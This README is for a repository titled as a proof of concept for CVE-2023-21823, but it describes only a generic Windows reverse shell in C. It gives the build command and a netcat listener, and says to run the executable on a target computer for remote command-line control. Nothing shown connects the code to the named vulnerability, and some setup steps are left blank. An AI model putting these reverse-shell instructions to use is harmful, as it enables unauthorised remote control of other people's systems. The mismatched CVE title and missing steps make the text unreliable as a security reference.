
CVE-2023-21823 PoC
This repository contains C code that implements a reverse shell for the Windows operating system. A reverse shell allows for remote system control using the command-line, providing the ability to execute commands on the infected machine.
Using this code for illegal purposes or without the permission of the system owner is unlawful and against ethical principles. This code is provided for educational and research purposes only.
To build the project, you will need a C compiler such as MinGW or Microsoft Visual Studio.
gcc -o reverse_shell.exe main.c -lws2_32
Before using the reverse shell:
To run the reverse shell:
nc -l -p 1234
reverse_shell.exe file on the target computer.
After this, you will have remote access to the target computer's command-line via the specified port.